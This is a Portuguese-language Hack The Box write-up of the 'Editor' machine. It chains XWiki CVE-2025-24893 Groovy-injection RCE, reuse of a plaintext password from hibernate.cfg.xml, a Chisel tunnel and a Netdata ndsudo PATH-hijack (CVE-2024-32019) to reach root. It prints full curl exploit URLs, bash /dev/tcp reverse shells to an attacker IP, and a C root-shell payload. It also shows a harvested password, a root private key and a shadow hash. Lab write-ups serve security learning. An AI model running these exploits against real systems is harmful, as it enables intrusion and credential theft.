Editor

https://app.hackthebox.com/machines/Editor

Summary

Editor é uma máquina Linux de dificuldade fácil que destaca os riscos de plataformas de documentação administrativa expostas e vulnerabilidades em serviços internos. O acesso inicial foi obtido através da enumeração de subdomínios para descobrir uma instância XWiki, que se mostrou vulnerável a uma falha de Execução Remota de Código (RCE) não autenticada no macro SolrSearch (CVE-2025-24893).

A enumeração pós-exploração revelou credenciais de banco de dados codificadas nos arquivos de configuração do XWiki, permitindo a movimentação lateral para o usuário oliver por meio da reutilização de senha. A escalação de privilégios para root foi alcançada ao identificar um serviço de monitoramento interno Netdata. Ao tunelar a porta interna para a máquina de ataque, uma vulnerabilidade de Escalação de Privilégios Local (LPE) (CVE-2024-32019) foi explorada no binário ndsudo, permitindo o sequestro de PATH e a execução arbitrária de comandos como root.

Attack Chain

1. Reconnaissance: Identificado o subdomínio wiki.editor.htb via enumeração de ativos JavaScript.

2. Initial Access: Exploração da CVE-2025-24893 (XWiki SolrSearch RCE) para obter uma shell reversa como o usuário xwiki.

3. Lateral Movement: Recuperação de credenciais em texto claro do arquivo hibernate.cfg.xml e utilização das mesmas para acesso SSH como usuário oliver.

4. Discovery: Identificado o serviço Netdata rodando na porta interna 19999.

5. Command and Control: Estabelecido um túnel reverso com Chisel para acessar o painel do Netdata.

6. Privilege Escalation: Exploração da CVE-2024-32019 via binário SUID ndsudo (Sequestro de PATH) para executar um binário malicioso como root.

---

Reconnaissance

Remote System Connection

#attack/T1018

Testes iniciais de conectividade foram realizados utilizando requisições de eco ICMP para verificar a disponibilidade do alvo e estimar o sistema operacional subjacente.

┌──(attacker㉿machine)
└─# ping -c 1 10.10.11.80
PING 10.10.11.80 (10.10.11.80) 56(84) bytes of data.
64 bytes from 10.10.11.80: icmp_seq=1 ttl=63 time=40.2 ms
<SNIP>

O valor de Time to Live (TTL) de 63 sugere que o alvo é uma máquina baseada em Linux, considerando um único salto entre o atacante e o alvo.

Network Scanning

#attack/T1595

Para mapear a superfície de ataque, foi executada uma varredura completa de portas TCP. Isso identificou três portas abertas associadas a serviços administrativos e web padrão.

┌──(attacker㉿machine)
└─# sudo nmap 10.10.11.80 -sS --min-rate=5000 -p- -vv -n -Pn -oG nmap-tcp-ports.txt

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
80/tcp   open  http       syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63

Service Enumeration

#attack/T1046

Após a identificação das portas abertas, foi realizada uma varredura de serviços direcionada para determinar informações de versão e identificar potenciais aplicações web.

┌──(attacker㉿machine)
└─# nmap 10.10.11.80 -sV -sC -p22,80,8080

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open  http    Jetty 10.0.20
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
|_/xwiki/bin/undelete/
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Infrastructure Analysis

O serviço nginx na porta 80 estava configurado para redirecionar para um host virtual chamado editor.htb. Para interagir com a aplicação web, o arquivo /etc/hosts local foi atualizado para resolver o domínio.

┌──(attacker㉿machine)
└─# echo -e "10.10.11.80\\teditor.htb" | sudo tee -a /etc/hosts
10.10.11.80	editor.htb

┌──(attacker㉿machine)
└─# ping -c 1 editor.htb
PING editor.htb (10.10.11.80) 56(84) bytes of data.
64 bytes from editor.htb (10.10.11.80): icmp_seq=1 ttl=63 time=39.7 ms

O cruzamento das versões dos serviços com o banco de dados Launchpad Ubuntu forneceu insights mais detalhados sobre o sistema operacional do host:

• SSH (OpenSSH 8.9p1-3ubuntu0.13): Associado ao Ubuntu Jammy (22.04 LTS).

• HTTP 80 (nginx 1.18.0-6ubuntu8.2): Associado ao Ubuntu Hirsute (21.04).

A discrepância entre os codinomes dos pacotes (Jammy vs. Hirsute) sugere a possibilidade de conteinerização ou de serviços rodando em ambientes diferentes (ex: Docker ou LXC) no mesmo host.

---

Web Exploitation

Tech Profiling

#attack/T1592_002 #attack/T1083

O fingerprinting inicial do serviço web na Porta 80 foi conduzido utilizando o whatweb para identificar a stack tecnológica subjacente e as configurações do servidor.

┌──(attacker㉿machine)
└─# whatweb -v http://editor.htb
WhatWeb report for http://editor.htb
Status    : 200 OK
Title     : Editor - SimplistCode Pro
IP        : 10.10.11.80
Summary   : HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], nginx[1.18.0], Script[module]

HTTP Headers:
	HTTP/1.1 200 OK
	Server: nginx/1.18.0 (Ubuntu)
	Content-Type: text/html
	Last-Modified: Sun, 15 Jun 2025 06:18:30 GMT
	Connection: close
	ETag: W/"684e65b6-277"
	Content-Encoding: gzip

O servidor está executando o nginx 1.18.0. Uma busca por exploits conhecidos para esta versão específica não retornou resultados imediatos.

┌──(attacker㉿machine)
└─# searchsploit nginx 1.18.0
Exploits: No Results
Shellcodes: No Results

A inspeção manual da página inicial revelou uma landing page de uma IDE chamada SimplistCode Pro. O site fornece links de download para instaladores Linux (.deb) e Windows (.exe). Além disso, um endereço de e-mail administrativo, contact@editor.htb, foi identificado.

Subdomain Discovery

O rastreamento (crawling) automatizado com o gospider foi empregado para identificar endpoints adicionais e potenciais subdomains dentro dos ativos JavaScript da aplicação.

┌──(attacker㉿machine)
└─# gospider --subs -s http://editor.htb
[url] - [code-200] - http://editor.htb
[href] - http://editor.htb/assets/index-DzxC4GL5.css
[javascript] - http://editor.htb/assets/index-VRKEJlit.js
[subdomains] - http://wiki.editor.htb
[linkfinder] - [from: http://editor.htb/assets/index-VRKEJlit.js] - /assets/simplistcode_1.0.deb
[linkfinder] - [from: http://editor.htb/assets/index-VRKEJlit.js] - config.json
<SNIP>

O rastreamento identificou com sucesso um novo host virtual: wiki.editor.htb. Este subdomínio foi adicionado ao arquivo /etc/hosts local para investigação posterior.

┌──(attacker㉿machine)
└─# sudo sed -i '$s/$/ wiki.editor.htb/' /etc/hosts
┌──(attacker㉿machine)
└─# ping -c 1 wiki.editor.htb
64 bytes from editor.htb (10.10.11.80): icmp_seq=1 ttl=63 time=39.0 ms

XWiki Enumeration

#attack/T1589_002 #attack/T1592

O subdomínio wiki.editor.htb parece servir como um hub de documentação para o projeto SimplistCode Pro, gerenciado pela plataforma XWiki.

┌──(attacker㉿machine)
└─# whatweb -v http://wiki.editor.htb
WhatWeb report for http://wiki.editor.htb
Status    : 302 Found
RedirectLocation: http://wiki.editor.htb/xwiki/bin/view/Main/

WhatWeb report for http://wiki.editor.htb/xwiki/bin/view/Main/
Status    : 200 OK
Title     : XWiki - Main - Intro
Summary   : Cookies[JSESSIONID], HTML5, nginx[1.18.0], XWiki
HTTP Headers:
	Set-Cookie: JSESSIONID=node01qz7xdmriljgod74xie1lisxo50599.node0; Path=/xwiki
	Content-Language: en

O acesso ao wiki revelou que a aplicação está executando o XWiki 15.10.8. Embora o searchsploit não liste exploits diretos para esta versão específica, o wiki contém documentação valiosa sobre a aplicação SimplistCode Pro.

Information Leakage

A página "Main - Intro" foi escrita por Neal Bagwell. Isso identifica um nome de usuário potencial, neal, para futuros ataques de força bruta ou autenticação.

---

RCE via XWiki SolrSearchMacros (CVE-2025-24893)

#attack/T1210 #owasp/A03_2025 #owasp/A05_2025 #mitre/CWE-95

A investigação posterior da Porta 8080 confirmou que ela atua como um ponto de entrada secundário ou proxy para o serviço XWiki identificado anteriormente. Embora scanners de vulnerabilidade automatizados como o nuclei não tenham sinalizado problemas específicos, a pesquisa manual sobre a versão 15.10.8 do XWiki revelou uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada, rastreada como CVE-2025-24893.

A vulnerabilidade existe no macro SolrSearch, onde a sanitização inadequada permite que um usuário convidado injete um bloco de execução async contendo código Groovy arbitrário.

Vulnerability Validation

Uma Prova de Conceito (PoC) foi executada para confirmar o contexto de execução. Ao enviar uma requisição GET manipulada para o endpoint SolrSearch, o servidor foi forçado a calcular uma expressão matemática dentro de um bloco de script Groovy.

┌──(attacker㉿machine)
└─# curl -s -X GET 'http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20' | html2text
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
  <channel>
    <title>RSS feed for search on [}}}Hello from search text:42 ]</title>
<SNIP>

O título da resposta contendo Hello from search text:42 confirma que o motor Groovy executou o código injetado, verificando a vulnerabilidade de RCE.

Arbitrary File Read & Local Enumeration

#attack/T1083 #attack/T1592_002

Aproveitando o RCE, o payload foi modificado para executar comandos do sistema utilizando o método .execute().text do Groovy. Isso permitiu a exfiltração de arquivos sensíveis do sistema, começando pelo /etc/passwd. Detalhes técnicos adicionais sobre este vetor de exploração específico podem ser encontrados na análise de vulnerabilidade da OffSec.

┌──(attacker㉿machine)
└─# curl -s -X GET 'http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d' | html2text

<SNIP>
<description>RSS feed for search on [}}}root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<SNIP>
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat:/usr/sbin/nologin
xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
netdata:x:996:999:netdata:/opt/netdata:/usr/sbin/nologin
oliver:x:1000:1000:,:/home/oliver:/bin/bash
_laurel:x:995:995::/var/log/laurel:/bin/false]</description>
<SNIP>

A análise do arquivo /etc/passwd identificou dois usuários principais com acesso a shell interativa, que serão o foco para obter um acesso persistente:

┌──(attacker㉿machine)
└─# grep sh$ passwd.txt 
root:x:0:0:root:/root:/bin/bash
oliver:x:1000:1000:,:/home/oliver:/bin/bash

O alvo está confirmado como vulnerável a RCE não autenticado como o usuário xwiki. A existência do usuário local oliver fornece um caminho claro para movimentação lateral ou escalação de privilégios.

---

Initial Access

Remote Code Execution & Reverse Shell

#attack/T1210 #attack/T1059_004 #owasp/A05_2025

Com a execução de comandos confirmada através da vulnerabilidade SolrSearch do XWiki, o próximo objetivo foi estabelecer um acesso interativo. Um payload de shell reversa em Bash foi selecionado por sua confiabilidade em alvos baseados em Linux.

Para garantir que o payload não fosse corrompido pela interpretação de caracteres especiais dentro da URL ou pelo motor Groovy, o comando foi codificado em Base64.

┌──(attacker㉿machine)
└─# echo 'bash -i >& /dev/tcp/10.10.14.199/4444 0>&1' | base64
YmFzaCAtaSAgID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE5OS80NDQ0ICAgMD4mMQo=

A string codificada foi então inserida em um comando de execução Groovy projetado para decodificar e executar a shell via /bin/bash. A string inteira foi codificada em URL para manter a compatibilidade com a requisição HTTP GET.

Final Encoded Groovy Payload: println("bash -c {echo,YmFzaCAtaSAgID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE5OS80NDQ0ICAgMD4mMQo=}|{base64,-d}|{bash,-i}".execute().text)

Um listener foi inicializado na máquina de ataque usando netcat antes do envio do exploit.

┌──(attacker㉿machine)
└─# sudo nc -nlvp 4444
Listening on 0.0.0.0 4444

A requisição manipulada foi enviada usando curl, visando o endpoint vulnerável SolrSearch.

┌──(attacker㉿machine)
└─# curl -s -X GET 'http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22bash+-c+%7Becho%2CYmFzaCAtaSAgID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE5OS80NDQ0ICAgMD4mMQo%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22.execute%28%29.text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d'

Foothold Established

O listener interceptou com sucesso a conexão de entrada, fornecendo uma shell interativa como o usuário de serviço xwiki.

Connection received on 10.10.11.80 44402
bash: cannot set terminal process group (1050): Inappropriate ioctl for device
bash: no job control in this shell
xwiki@editor:/usr/lib/xwiki-jetty$ id; hostname -I
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
10.10.11.80 172.17.0.1 

TTY Stabilization

A shell inicial carecia de controle de tarefas (job control) e formatação adequada de terminal. Um procedimento padrão de estabilização foi realizado para permitir total interatividade, incluindo autocompletar com Tab e suporte para editores de texto.

xwiki@editor:/usr/lib/xwiki-jetty$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
xwiki@editor:/usr/lib/xwiki-jetty$ ^Z
[1]+  Stopped                 sudo nc -nlvp 4444

┌──(attacker㉿machine)
└─# stty raw -echo; fg
[back on target]
xwiki@editor:/usr/lib/xwiki-jetty$ reset xterm
xwiki@editor:/usr/lib/xwiki-jetty$ stty rows 65 columns 115
xwiki@editor:/usr/lib/xwiki-jetty$ export SHELL=bash TERM=xterm-256color HOME=/etc/skel

O ambiente foi normalizado com sucesso, permitindo uma pós-exploração e enumeração eficientes.

---

Discovery

System Enumeration

#attack/T1082 #attack/T1083

Após o estabelecimento bem-sucedido de um acesso inicial como o usuário de serviço xwiki, uma enumeração interna foi conduzida para mapear o ambiente local. As verificações iniciais confirmaram que o sistema operacional é o Ubuntu 22.04.5 LTS (Jammy), consistente com o reconhecimento prévio.

xwiki@editor:/usr/lib/xwiki-jetty$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04.5 LTS"
<SNIP>

Uma auditoria manual dos diretórios home revelou que o usuário oliver está presente no sistema, embora o diretório permaneça inacessível para o usuário atual.

Credential Harvesting

#attack/T1552_001 #owasp/A03_2025

Para identificar potenciais vetores de escalação de privilégios, os arquivos de configuração do XWiki foram auditados em busca de credenciais codificadas. Pesquisas indicaram que as strings de conexão de banco de dados são tipicamente armazenadas no arquivo hibernate.cfg.xml.

xwiki@editor:/usr/lib/xwiki-jetty$ find /etc/xwiki -type f -name "hibernate.cfg.xml" 2>/dev/null
/etc/xwiki/hibernate.cfg.xml

xwiki@editor:/usr/lib/xwiki-jetty$ grep -Ei "user|pass" /etc/xwiki/hibernate.cfg.xml
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">theEd1t0rTeam99</property>

Uma senha em texto claro para o usuário de banco de dados xwiki foi identificada: theEd1t0rTeam99.

Lateral Movement

#attack/T1078 #attack/T1021_004

Dada a frequência de reutilização de senhas em tais ambientes, a credencial descoberta foi testada contra o usuário oliver via SSH.

┌──(attacker㉿machine)
└─# ssh oliver@editor.htb
oliver@editor.htb's password: 
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)

oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

Lateral Movement Successful

A senha theEd1t0rTeam99 foi reutilizada com sucesso para a conta oliver, concedendo um nível de acesso mais elevado ao sistema.

oliver@editor:~$ cat user.txt 
498ed5b7789631df38136e944dc6aea5

Internal Service Enumeration

#attack/T1046

Com o acesso à conta oliver, foi realizada uma revisão das portas de escuta internas para identificar serviços restritos à interface localhost.

oliver@editor:~$ ss -tunlp
Netid  State   Recv-Q  Send-Q         Local Address:Port      Peer Address:Port
tcp    LISTEN  0       151                127.0.0.1:3306           0.0.0.0:*    
tcp    LISTEN  0       4096               127.0.0.1:19999          0.0.0.0:*    
tcp    LISTEN  0       511                  0.0.0.0:80             0.0.0.0:*    
<SNIP>

A saída revelou um serviço incomum rodando na Porta TCP 19999. A sondagem do serviço com curl identificou-o como um Netdata Embedded HTTP Server (v1.45.2).

oliver@editor:~$ curl -s -I http://127.0.0.1:19999
HTTP/1.1 200 OK
Connection: keep-alive
Server: Netdata Embedded HTTP Server v1.45.2
<SNIP>

Exfiltration of Internal Web Assets

Para facilitar a análise offline do painel do Netdata, o código-fonte HTML foi exfiltrado para a máquina de ataque usando o netcat.

Attacker Machine:

┌──(attacker㉿machine)
└─# nc -nlvp 8000 > netdata.html

Target Machine:

oliver@editor:~$ curl -s http://127.0.0.1:19999 > netdata.html
oliver@editor:~$ nc 10.10.14.199 8000 < netdata.html
oliver@editor:~$ md5sum netdata.html 
226467a12f3cfdb97e69dea63a7e1fd5  netdata.html

A integridade do arquivo exfiltrado foi verificada na máquina de ataque usando o hash MD5 226467a12f3cfdb97e69dea63a7e1fd5. Este serviço será analisado posteriormente em busca de potenciais vetores de escalação de privilégios para root.

---

Port Forwarding & Internal Service Access

#attack/T1572 #attack/T1090

Para facilitar uma análise abrangente do serviço Netdata rodando na interface de loopback (127.0.0.1:19999), foi estabelecido um túnel reverso usando o Chisel.

Tool Preparation & Optimization

A arquitetura do alvo foi confirmada como x86_64, e o binário correspondente do Chisel foi preparado na máquina de ataque. Para minimizar a pegada forense e acelerar a transferência, o binário foi compactado usando a utilidade upx.

┌──(attacker㉿machine)
└─# /opt/tools/upx --brute ./chisel
        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   9371800 ->   2824036   30.13%   linux/amd64   chisel                        

Packed 1 file.

O binário otimizado foi então transferido para o diretório /dev/shm do alvo por meio de um servidor HTTP baseado em Python.

oliver@editor# wget http://10.10.14.199:8000/chisel -O /dev/shm/chisel
oliver@editor# chmod +x /dev/shm/chisel

Tunnel Establishment

Um servidor Chisel foi inicializado na máquina de ataque, e o cliente foi executado no alvo para mapear a porta interna 19999 para a interface local do atacante.

Attacker (Server):

┌──(attacker㉿machine)
└─# ./chisel server -port 1234 --reverse

Target (Client):

oliver@editor# ./chisel client 10.10.14.199:1234 R:19999:127.0.0.1:19999

O túnel expôs com sucesso o serviço interno. A verificação com lsof confirmou que a máquina de ataque agora estava escutando na porta 19999.

---

Privilege Escalation

Local Privilege Escalation (CVE-2024-32019)

#attack/T1548_001 #attack/T1574_007 #mitre/CWE-426

Com o painel do Netdata acessível, uma auditoria de versão identificou o software como Netdata Agent v1.45.2.

Pesquisas sobre esta versão revelaram uma vulnerabilidade crítica de Escalação de Privilégios Local (LPE), CVE-2024-32019. A vulnerabilidade reside na ferramenta ndsudo, um binário SUID destinado a executar um conjunto restrito de comandos com privilégios de root. No entanto, o ndsudo falha ao não sanitizar a variável de ambiente PATH, permitindo que um atacante intercepte a execução colocando um binário malicioso em um diretório gravável pelo usuário.

SUID Binary Validation

A presença e as permissões do binário vulnerável foram verificadas no sistema alvo.

oliver@editor# find / -name "*ndsudo*" 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

oliver@editor# ls -la /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
-rwsr-x--- 1 root netdata 200576 Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo

O binário pertence ao root e tem o bit SUID definido (-rws). Como o usuário oliver é membro do grupo netdata, ele possui as permissões necessárias para executar este binário e acionar a vulnerabilidade de sequestro de PATH.

oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)

A análise posterior do binário ndsudo confirmou sua utilidade na execução de comandos administrativos em nome do agente Netdata. Ao invocar a flag --help, o conjunto de comandos suportados foi identificado, revelando que o ndsudo busca por executáveis específicos (como o nvme) dentro do PATH do sistema.

oliver@editor# /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help
ndsudo
(C) Netdata Inc.
A helper to allow Netdata run privileged commands.
<SNIP>
The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json
<SNIP>
The program searches for executables in the system path.

A vulnerabilidade decorre da confiança do binário em uma variável de ambiente PATH não confiável. Como o ndsudo é um executável SUID de propriedade do root, sequestrar o comando nvme via manipulação de PATH permite a execução arbitrária de código com privilégios elevados.

Public Exploit Compilation

#attack/T1587_004

Um payload malicioso baseado em C foi preparado para estabelecer uma shell reversa. O exploit foi compilado de forma estática na máquina de ataque para garantir a portabilidade e nomeado como nvme para corresponder ao executável esperado pelo ndsudo.

┌──(attacker㉿machine)
└─# cat exploit.c
#include <unistd.h>
#include <stdlib.h>

int main() {
    setuid(0);
    setgid(0);
    system("bash -c 'bash -i >& /dev/tcp/10.10.14.199/9001 0>&1'");
    return 0;
}

┌──(attacker㉿machine)
└─# gcc -o nvme exploit.c -static

Execution & Path Hijacking

#attack/T1574_007

O binário compilado foi transferido para o diretório /dev/shm do alvo. Para acionar o exploit, a variável PATH foi precedida pelo diretório de trabalho atual, forçando o ndsudo a executar o binário nvme malicioso em vez da utilidade legítima do sistema.

oliver@editor:/dev/shm# wget http://10.10.14.199:8000/nvme
oliver@editor:/dev/shm# chmod +x nvme
oliver@editor:/dev/shm# PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Root Access Granted

O sequestro de PATH redirecionou com sucesso o fluxo de execução privilegiada para o binário malicioso, resultando em uma shell de root no listener.

┌──(attacker㉿machine)
└─# sudo nc -nlvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.11.80 35244
root@editor:/dev/shm# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)

root@editor:/dev/shm# cat /root/root.txt
989035e41800216fe35f82661c88b6df

Persistence & Credential Recovery

#attack/T1552_004 #attack/T1021_004 #attack_T1098_004

Para manter o acesso administrativo sem a necessidade de reexplorar a vulnerabilidade do ndsudo, a chave SSH privada do usuário root foi exfiltrada.

root@editor:/dev/shm# cat /root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
<SNIP>
TRIxZw2ANCpldxfWrt1SEOVWrBBsgFlTkkNlEMNcX4CzhovkKupC5Tu9fUgkUy6iQkx5zm
FLvpDdK+RXvFcAAAALcm9vdEBlZGl0b3I=
-----END OPENSSH PRIVATE KEY-----

A chave foi salva localmente e utilizada para estabelecer uma sessão SSH persistente de alta integridade.

┌──(attacker㉿machine)
└─# chmod 600 id_rsa
┌──(attacker㉿machine)
└─# ssh root@editor.htb -i id_rsa
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
root@editor:~#

Como etapa final de descoberta, o arquivo /etc/shadow foi amostrado para verificar a capacidade de colher hashes de senhas de todo o sistema para quebra offline. #attack/T1003_008

root@editor:~# head -n 1 /etc/shadow
root:$y$j9T$l1.MaTIpHzTAduIC4EoaA/$rNvK9Vq.iBxZ3BXRP4SM2CtSkVYdVnr5XrWQvMzLx99:20258:0:99999:7:::